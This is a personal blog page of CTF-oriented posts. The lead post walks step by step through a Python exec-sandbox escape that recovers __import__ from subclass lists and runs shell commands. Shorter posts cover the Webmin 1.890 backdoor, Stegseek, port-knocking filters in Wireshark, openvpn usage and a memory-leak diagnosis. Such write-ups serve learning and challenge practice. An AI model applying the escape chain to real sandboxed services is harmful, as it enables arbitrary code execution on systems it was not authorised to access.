Saturday, April 24, 2021

The Craziest Python Sandbox Escape

Several CTF Challenges involve Python Sandbox Escapes.

In essence, you're allowed to run a small piece of Python code, often being run by Pythons "exec" function which simply executes any code given to it.

With no restrictions, you can simply go:

>>> import os; os.system('whoami');
reelix

The "whoami" is simply a proof of concept. You can run any linux command from there, so you can alter files, create a reverse shell, and so on.

So they then limit the ability to use spaces so you can't do the import. You can bypass that by using one of Pythons builtin functions and going:

__import__('os').system('whoami');

So they then limit it further. No spaces, but now you're not allowed to use the words "import", "os", or "system" - Either Uppercase, or Lowercase. You can bypass that by converting the required words to strings, reversing them, and calling them directly, and go:

getattr(getattr(__builtins__,'__tropmi__'[::-1])('so'[::-1]),'metsys'[::-1])('whoami');

And that's about as far as most get. In a recent CTF however, I had all the above restrictions, but now no builtins (No __import__ or __builtins__), or quotes either!

Aside from the quote removal, the challenge was:

exec('Your Input Here', {'__builtins__': None, 'print':print});

Getting Letters

Python doesn't require the entire string to be together, so you can go:

>>> import os; os.system('who'+'am'+'i');
reelix

In addition, you can assign these to variables, so you can go:

>>> wordwhoami='w'+'ho'+'ami';import os;os.system(wordwhoami);
reelix

So, first, I needed some way to be able to get some letters.

If you run:

().__class__.__base__.__subclasses__();

It splits out every base class that Python3 has:

>>> ().__class__.__base__.__subclasses__();
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, ......

Well, this list of classes has letters in it, right? So lets use those!

We can't just use these letters directly, as it's a list of objects and not a string, so we need to convert that list to a string to be able to get access to the individual characters.

Whilst we can't just use str like you normally would since str is one of the builtin classes that were stripped, that list of classes has <class 'str'> in it at position 22 - So let's use that instead!

>>> ().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__());
"[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>......

And, since it's now a string, we can simply use the positional index to pluck out specific characters!

We need an "o" and an "s" for "os". The "s" we can get from the word "class" at the start at index 5, and the "o" we can get from "NoneType" at index 164. So, to print "os" we can go:

>>> ().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164]+().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
'os'

Let's assign them some variables so it's easier to use them later.

>>> charo=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164];
chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
charo+chars;
'os'

Getting __import__ back

Now I was stuck for awhile. I couldn't just any of the builtin classes since they were stripped, so I couldn't run __import__ to import the "os" I had just created - Now what!

After extensive searching, I came across this link showing that the base class "_frozen_importlib.BuiltinImporter" had a .load_module method that could get the builtins back!

Similar to how we used the "str" method to convert our original list to a string, we can call this method by its index in our base list (At position 84), and construct the text it required for the .load_module method from a list of indexed characters!

>>> charb=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[53];
>>> charu=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[235];
>>> chari=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[94];
>>> charl=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[51];
>>> chart=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[9];
>>> charn=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[95];
>>> chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
>>> ().__class__.__bases__[0].__subclasses__()[84]().load_module(charb+charu+chari+charl+chart+chari+charn+chars).__import__;
<built-in function __import__>

And now we have our __import__ back! Hurrah!

Putting it all together

Now we just need to add the missing characters for the rest, neaten it up a bit, and we're done - Full code execution!

>>> charb=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[53];
>>> charu=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[235];
>>> chari=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[94];
>>> charl=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[51];
>>> chart=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[9];
>>> charn=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[95];
>>> chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
>>> charo=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164];
>>> charw=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[25];
>>> charh=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[540];
>>> chara=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[4];
>>> charm=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[187];
>>> bi=().__class__.__bases__[0].__subclasses__()[84]().load_module(charb+charu+chari+charl+chart+chari+charn+chars);
>>> bi.__import__(charo+chars).system(charw+charh+charo+chara+charm+chari);
reelix
Posted by at 6 comments

Saturday, April 17, 2021

Stegseek - A proper Steghide cracker at last!

During CTF challenges, they sometimes hide data inside an image with Steghide. The common way to solve these is to use steghide with a located password or crack the password from a wordlist. Up until now, this has been EXTREMELY slow with common brute-force applications re-running Steghide with each and every password in the list - Around 500 attempts per second on faster systems. When attempting to do this with a larger password list such as RockYou which contains millions of entries, this speed was obviously an issue.

During some recent browsing, I found a tool that can not only crack these passwords TWENTY THOUSAND TIMES FASTER, but in some cases can actually locate data inside a password-protected Steghide image without actually knowing the original password by brute-forcing every possible way that Steghide uses to embed the image in the first place o_O

Link to the tool on Github: Stegseek

Posted by at 0 comments

Wednesday, March 31, 2021

TryHackMe Certs

A kind fellow bought me a 30-day membership to Premium TryHackMe, so I decided to get some of their certificates whilst I was able to. 


I also got this one last Christmas, although whilst I'm sticking them all here, I might as well include this one too.




Posted by at 0 comments

Tuesday, October 20, 2020

Wireshark - Filtering for a Port Knocking sequence

In a recent CTF, I was required to analyze a .pcapng file to find a Port Knocking sequence. I didn't know an easy way to do this, and Google only gave up some half useful answers, so after a bit of research, I decided to write this post in the hopes that someone may stumble upon it in the future :)

Filter: (tcp.flags.reset eq 1) && (tcp.flags.ack eq 1)


Before


After


Make sure that the order number is correct (The "No." column goes from lowest to highest), and read the Port number on the left in the "Info" column.

In this case, the sequence is 7864, 8273, 9241, 12007, 60753, so a:

> knock 10.10.35.61 7864 8273 9241 12007 60753 -t 500

Would get you what you need. 

I found that sometimes you might need to knock 2 or 3 times before the filtered port opens for some reason, but there you go!

Posted by at 2 comments

Sunday, October 11, 2020

Photogenic Cheetah

 :D

Photogenic Cheetah

Posted by at 0 comments

Wednesday, August 12, 2020

What looks like binary, but isn't?

Whilst doing a CTF, I came across a crypto challenge similar to the following that looked like binary:

11111111110010001010101110101111111010111111111101101101101100000110100100101111111111111100101001011110010100000000000010100110111100101001001011111111111001010011111111111111100101001011100101000101011110010100000000000000000000000000010101110010100111110010100110010100101111100101001010010100110111111111111111111111111111100101001111111111111111111111110010100100100000000000000000000000000000000000000000000000000000000000000000000000010100100000000000000000000000000000000000000000000010100010101111111001010000000000001010111111111111111001010

After it failed decoding AS binary, I tried the Magic option on CyberChef which failed, and several variations of the Baconian cipher - Which also failed.

After much searching and many failings, I came across Spoon - An esoteric programming language whose code looks like binary. A quick Google search led me to this online interpreter from dCode. Pasting in the text and clicking the "Execute" button got me the result I needed!
Posted by at 0 comments

Sunday, July 19, 2020

The one honest VPN video on YouTube

Posted by at 0 comments

Wednesday, July 8, 2020

Exploiting Webmin 1.890 through cURL

In a recent CTF, I came across a legacy version of Webmin with a Metasploit module. I prefer to do things without Metasploit, so decided to use cURL.



    • In the above, you can see that Webmin is running by the page title - "Login to Webmin" and the version - "Server: MiniServ/1.890"

    This specific version of Webmin has a backdoor with an associated Metasploit Module. The exploit looked easy enough, so I decided to do it manually.



    • Basic code execution.



    • We're already root...



    • And there's the flag. I won't cat it in this post, but there you go.
    Posted by at 0 comments

    Monday, September 9, 2019

    Diagnosing a weird lack of RAM

    Whilst recently playing Warframe, the game crashed with an "Out of Memory" error. I found this to be a bit odd as I have 32GB RAM.

    Checking Task Manager, I saw my RAM Usage was weirdly high (25GB / 31.9GB). After closing everything (Chrome, Discord, Visual Studio, SQL Server, etc), it was still sitting at 19GB which was still really high.

    I downloaded the latest version of RAMMap to figure out what was going on. It didn't show any process leaking anything (I have had issues with excessive Modified Page List Bytes being used in the past since I intentionally have no Pagefile - But it wasn't the case here). Then I saw something odd.


    The "Nonpaged Pool" (Whatever that was?) was using up 13.1GB RAM. I didn't realize that was unusual until I searched around and figured out that it should be taking around 500MB - Max - On a Server - With over 100 days uptime. Something was definitely up!

    After extensive research, I found out that the "Nonpaged Pool" was a collection of RAM used up by System drivers. Most people simply recommended to reboot when it gets high, but that wasn't good enough for me - I wanted to figure out what was wrong!

    I eventually came across this awesome page which got me to install the latest Windows SDK to get a process called "poolmon.exe" (Installing a 9GB SDK for a single app seems excessive, but I couldn't figure out any other way to get it...). After running the program and ordering things, the issue was immediately apparent.


    Something with the tag of "AfdB" was using up 6821892960 Bytes (Or 6.8GB) of RAM, whilst the next highest thing "EtwB" was using up 33046784 Bytes (or 33MB) of RAM.

    I opened up CMD and ran

    > findstr /m /l /s AfdB C:\Windows\System32\Drivers\*.sys

    And came up with two results.

    > C:\Windows\System32\Drivers\afd.sys
    > C:\Windows\System32\Drivers\EasyAntiCheat.sys

    So, the problem was either in afd.sys (The "Ancillary Function Driver for WinSock"), or EasyAntiCheat.sys (A third-party anti-hacking program installed by some games). You can most likely guess which one was the issue :p

    The EastAntiCheat.sys in my System32\Drivers folder was from 2016. The latest version correctly located at C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.sys was from 2019. I rebooted in Safe Mode, deleted the one in System32, and rebooted again.

    After 3 days of uptime, my PC is now sitting at a happy 5GB / 31.9GB, and the Non-paged pool is at a much happier 148MB. Much better :)

    Posted by at 0 comments

    Sunday, July 28, 2019

    Running openvpn without it hanging the terminal

    Whilst messing around with HackTheBox, I attempted to connect to the VPN from an Ubuntu VM I have with Google.

    The annoying part was that after it ran, it would hang at "Initialization Sequence Completed", and required a second terminal connection to continue. If I Control+C'd, it would kill the VPN connection.

    After a bit of searching, I found that I could run it then background it by going

    > sudo openvpn Reelix.ovpn &

    In which case it would still hang at "Initialization Sequence Completed", but I could Control+C it without it killing it. Close... But the hanging annoyed me.

    After a bit more searching, I found that OpenVPN had a --daemon parameter, but going

    > sudo openvpn Reelix.ovpn --daemon

    Threw up an error

    > Options error: I'm trying to parse "Reelix.ovpn" as an --option parameter but I don't see a leading '--'
    > Use --help for more information.

    After much searching, I eventually discovered the trick!

    > sudo openvpn --config Reelix.ovpn --daemon

    Success!



    To kill the connection, I could either go

    > sudo pkill -f "openvpn --config Reelix.ovpn"

    Or

    > ps aux | grep openvpn
    > sudo kill -2 processIdHere
    Posted by at 3 comments
    Subscribe to: Posts ( Atom )